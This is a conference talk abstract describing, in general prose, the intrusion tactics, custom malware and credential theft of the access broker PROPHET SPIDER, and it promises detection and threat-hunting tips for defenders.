Hunting Prolific Access Broker PROPHET SPIDER

Eric Loui | Ryan Tancibok

PROPHET SPIDER is an access broker that has conducted low-volume, opportunistic web server compromises since at least May 2017. The adversary primarily gains access to victims by compromising vulnerable web servers, leveraging a range of vulnerabilities for this purpose. This presentation will discuss PROPHET SPIDER’s distinctive tactics, techniques, and procedures (TTPs), details of the adversary’s custom malware, and provide tips for detection and threat hunting.

PROPHET SPIDER exploits known vulnerabilities in Internet-facing servers, including Citrix, Ivanti CSA, JBoss, and particularly Oracle WebLogic. On Windows, the adversary uses PowerShell to download a WGet binary for ingress tool transfer, while typically running Python or Perl reverse shells on Linux. PROPHET SPIDER often deploys both JSP or ASP.NET webshells and executable backdoors to enable persistence. In some cases, the adversary has attempted to compile tools using GCC.

PROPHET SPIDER focuses primarily on capturing legitimate credentials. On Windows, the adversary uses a variety of OS credential dumping techniques, and regularly tries to capture NTDS.DIT. On Linux, the adversary searches for private keys using cat and grep. To move laterally, PROPHET SPIDER uses low-prevalence binaries to scan internal IP ranges, while trying to authenticate using stolen credentials over RDP or SSH. PROPHET SPIDER usually compresses credential-related files into 7zip archives, and exfiltrates these archives over PSCP or FTP. In multiple cases, PROPHET SPIDER intrusions have led to ransomware deployment (including Egregor and MountLocker) or data extortion actors demanding payment in exchange for deleting stolen files, indicating the adversary is likely an access broker.

PROPHET SPIDER’s malware has slowly matured and the adversary has recently shifted from Go to C++. PROPHET SPIDER’s custom tools are typically run by creating a new service. Several Remote Access Trojans (RATs) and proxy tools provide PROPHET SPIDER with flexible capabilities to execute arbitrary commands and exfiltrate data from victim networks.

PROPHET SPIDER has attempted to steadily improve the obfuscation of their code and C2 communications. Custom binary protocols and cryptographic procedures have been implemented in the adversary’s tools.

Fortunately, PROPHET SPIDER is a creature of habit. This presentation will conclude with consistent directory names, filenames, command-line artifacts, URL patterns, and other behaviors that threat hunters and intelligence analysts can use to uncover PROPHET SPIDER intrusions.